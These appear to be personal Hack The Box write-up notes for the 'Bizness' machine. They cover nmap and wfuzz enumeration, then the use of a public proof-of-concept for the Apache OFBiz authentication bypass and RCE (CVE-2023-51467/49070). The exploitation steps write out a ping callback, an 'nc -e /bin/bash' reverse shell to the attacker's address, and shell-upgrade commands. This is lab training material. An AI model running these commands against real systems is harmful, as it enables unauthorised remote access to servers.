Bizness

Apache

Document


=======================================================================

Initial Information:

=======================================================================

We define environment variables to work and execute scans using those variables

❯ target1

Por favor, ingresa la nueva dirección IP de destino: 10.10.11.252


❯ htp bizness

Definiendo las siguientes variables:

export htf="/home/ass/Documents/GitHub/4rji/4rjinotes/htb/bizness/bizness.md"

export htcon="/home/ass/Documents/GitHub/4rji/4rjinotes/htb/bizness"

export ip="10.10.11.252"

We perform a basic scan.



# Nmap 7.94SVN scan initiated Sun May 26 23:28:36 2024 as: nmap -sCV -p 22,80,443,45177 -oN expo3 10.10.11.252
Nmap scan report for 10.10.11.252
Host is up (0.59s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp    open  http       nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp   open  ssl/http   nginx 1.18.0
| tls-alpn: 
|_  http/1.1
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
45177/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 26 23:29:17 2024 -- 1 IP address (1 host up) scanned in 40.86 seconds

Nmap reports that it did not follow the redirect to https://bizness.htb/ (the hostname does not resolve yet), so we add the domain to /etc/hosts using the hosthtb script.

❯ hosthtb bizness.htb

Se ha agregado "10.10.11.252 bizness.htb" al archivo /etc/hosts.


cat /etc/hosts

10.10.11.252 bizness.htb
Bizness website


=======================================================================

Enumeration

=======================================================================

Apache OFBiz Authentication Bypass Vulnerability

By identifying the technology behind the website (Apache OFBiz), we can see that it is vulnerable to the Apache OFBiz authentication bypass.

wfuzz -c --hc 404,302 -t  200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt "https://bizness.htb/FUZZ"

 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly w>
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://bizness.htb/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                           >
=====================================================================

000000012:   200        522 L    1736 W     27200 Ch    "# on at least 2 different hosts"                                                 >
000000002:   200        522 L    1736 W     27200 Ch    "#"                                                                               >
000000006:   200        522 L    1736 W     27200 Ch    "# Attribution-Share Alike 3.0 License. To view a copy of this"                   >
000000004:   200        522 L    1736 W     27200 Ch    "#"                                                                               >
000000005:   200        522 L    1736 W     27200 Ch    "# This work is licensed under the Creative Commons"                              >
000000007:   200        522 L    1736 W     27200 Ch    "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                 >
000000014:   200        522 L    1736 W     27200 Ch    "https://bizness.htb/"                                                            >
000000013:   200        522 L    1736 W     27200 Ch    "#"                                                                               >
000000003:   200        522 L    1736 W     27200 Ch    "# Copyright 2007 James Fisher"                                                   >
000000010:   200        522 L    1736 W     27200 Ch    "#"                                                                               >
000000008:   200        522 L    1736 W     27200 Ch    "# or send a letter to Creative Commons, 171 Second Street,"                      >
000000009:   200        522 L    1736 W     27200 Ch    "# Suite 300, San Francisco, California, 94105, USA."                             >
000000011:   200        522 L    1736 W     27200 Ch    "# Priority ordered case-sensitive list, where entries were found"                >
000000001:   200        522 L    1736 W     27200 Ch    "# directory-list-2.3-medium.txt"                                                 >
000002332:   200        491 L    1596 W     34632 Ch    "control"                                                                         >
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 105.2991
Processed Requests: 17091
Filtered Requests: 17076
Requests/sec.: 162.3089

We notice that the only hit whose size differs is "control". We spot it by comparing the Lines and Words columns: every other result returns the same 522 L / 1736 W page (the home page served for unknown paths), while "control" returns 491 L / 1596 W.
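The size comparison above can be automated. This is an added example, not part of the original notes: it parses wfuzz result lines (a constructed sample copied from the run above), groups hits by their (status, lines, words, chars) signature, treats the largest group as the "same page" noise, and reports everything else as worth a manual look, plus the --hw value that would suppress that noise on a re-run against the same base path.

```python
import re
from collections import Counter

# Constructed sample: a trimmed copy of the wfuzz result lines from the run above.
WFUZZ_OUTPUT = """
000000012:   200        522 L    1736 W     27200 Ch    "# on at least 2 different hosts"
000000002:   200        522 L    1736 W     27200 Ch    "#"
000000014:   200        522 L    1736 W     27200 Ch    "https://bizness.htb/"
000000003:   200        522 L    1736 W     27200 Ch    "# Copyright 2007 James Fisher"
000000001:   200        522 L    1736 W     27200 Ch    "# directory-list-2.3-medium.txt"
000002332:   200        491 L    1596 W     34632 Ch    "control"
"""

# One wfuzz result row: id, HTTP status, lines, words, chars, quoted payload.
RESULT_RE = re.compile(
    r'^\s*(\d+):\s+(\d{3})\s+(\d+) L\s+(\d+) W\s+(\d+) Ch\s+"(.*)"\s*$'
)


def parse_results(text):
    """Return a list of (payload, status, lines, words, chars) tuples."""
    rows = []
    for line in text.splitlines():
        m = RESULT_RE.match(line)
        if m:
            _id, status, lines, words, chars, payload = m.groups()
            rows.append((payload, int(status), int(lines), int(words), int(chars)))
    return rows


def find_outliers(rows):
    """Group hits by (status, lines, words, chars). The biggest group is the
    catch-all page; any payload outside it is a genuinely different response."""
    signature = lambda r: r[1:]
    dominant, _count = Counter(signature(r) for r in rows).most_common(1)[0]
    outliers = [r[0] for r in rows if signature(r) != dominant]
    return dominant, outliers


def suggest_hide_words(rows):
    """Word count of the dominant cluster: pass it as --hw to hide that noise."""
    dominant, _ = find_outliers(rows)
    return dominant[2]


if __name__ == "__main__":
    rows = parse_results(WFUZZ_OUTPUT)
    dominant, outliers = find_outliers(rows)
    print("catch-all signature (status, L, W, Ch):", dominant)
    print("payloads worth a look:", outliers)
    print("re-run with --hw=%d to hide the catch-all page" % suggest_hide_words(rows))
```

For the later run under /control/ the catch-all page changes, which is why the notes hide 1596 words there (the size of /control itself) rather than 1736.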

We visit /control but find nothing there, so we fuzz again beneath it, since it looks like a directory. This time we add --hw=1596 to hide every response with 1596 words (the size of the /control page itself), which removes the noise from repeated pages.

wfuzz -c --hc=404,302 --hw=1596 -t  200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt "https://bizness.htb/co>

 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly w>
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://bizness.htb/control/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                            
=====================================================================

000000077:   200        140 L    496 W      9308 Ch     "main"                                                             
000000138:   200        140 L    496 W      9308 Ch     "view"                                                             
000000061:   200        179 L    580 W      10756 Ch    "help"                                                             
000000053:   200        185 L    598 W      11060 Ch    "login"                                                            
000001225:   200        179 L    580 W      10756 Ch    "logout"                                                           
000003032:   200        140 L    496 W      9308 Ch     "views"                                                            
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
^C
Total time: 0
Processed Requests: 3415
Filtered Requests: 3409
Requests/sec.: 0

We found the login page.

The default credentials (admin / ofbiz) didn't work.

Now that we've found the login, we search for a way to exploit it. We found a GitHub repository that allows us to do so: a PoC for the CVE-2023-51467 and CVE-2023-49070 pre-auth RCE vulnerabilities found in Apache OFBiz.

  • Download

git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git

  • CVEs

    First, we will investigate what these CVEs are about.

    • CVE-2023-51467

      CVE-2023-51467 is a critical security vulnerability affecting Apache OFBiz, a Java-based enterprise resource planning (ERP) system. This vulnerability allows attackers to bypass authentication mechanisms, leading to potential server-side request forgery (SSRF) and remote code execution (RCE). The vulnerability has been rated with a high severity score of 9.8 on the CVSS scale.
    • CVE-2023-49070

      CVE-2023-49070 is a critical pre-authentication remote code execution (RCE) vulnerability affecting Apache OFBiz versions prior to 18.12.10. This vulnerability arises from the presence of an outdated and unmaintained XML-RPC component in Apache OFBiz. Exploiting this flaw, an attacker can execute arbitrary code on the affected server without requiring authentication, granting them full control over the server. This could lead to data theft, operational disruption, or further attacks on the organization's network.




    =======================================================================

    Post Exploitation

    =======================================================================

    We clone the repository and use the first script to see if it is exploitable.

    • 1

      xdetection.py

      ❯ python3 xdetection.py --url https://bizness.htb
      [+] Scanning started...
      [+] Apache OFBiz instance seems to be vulnerable.
    • 2

      CMD: we send a command, in this case a ping to our machine, to check whether it arrives and so confirm that we can inject commands.

      python3 exploit.py --url https://bizness.htb --cmd 'ping -c 1 10.10.14.1'
      [+] Generating payload...
      [+] Payload generated successfully.
      [+] Sending malicious serialized payload...
      [+] The request has been successfully sent. Check the result of the command.
    • 3

      We listen with tcpdump and indeed receive the ping.

      sudo tcpdump -i  tun0
      tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
      listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
      23:57:25.852958 IP 10.10.14.11 > 10.10.14.1: ICMP echo request, id 8978, seq 1, length 64
      23:57:26.095255 IP 10.10.14.1 > 10.10.14.11: ICMP echo reply, id 8978, seq 1, length 64
    • 4

      Now we make the box connect back to us with nc (netcat).

      python3 exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash 10.10.14.11 8080'
      [+] Generating payload...
      [+] Payload generated successfully.
      [+] Sending malicious serialized payload...
      [+] The request has been successfully sent. Check the result of the command.
      
      nc -nlvp 8080
      listening on [any] 8080 ...
      connect to [10.10.14.11] from (UNKNOWN) [10.10.11.252] 43186
      whoami
      ofbiz
    • 5

      We upgrade to a fully interactive shell.

      • 5.1
        script /dev/null -c bash
        ^Z
        stty raw -echo; fg
        [1]  + 212494 continued  nc -nlvp 8080
        reset xterm
      • 5.2

        Finally, we adjust the size of the tty.

        export TERM=xterm-256color
        
        # In our Terminal: 
        stty size
        19 120
        
        # Back to the box
        ofbiz@bizness:/opt/ofbiz$ stty rows 19 cols 120




    [+] PrivEsc Notes:
    [+] System Enumeration:
    • Host:
    • Compilation version and architecture:
    [+] List Interesting Directories:
    • /tmp
    • /opt
    • /var/tmp
    • /dev/shm
    • /var/backups/
    • /var/mail
    [+] SUID/SGID binaries:
    [+] ROOT Processes (ps) :
    [+] Local Network Services (netstat/ss):
    [+] I/O - PsPy: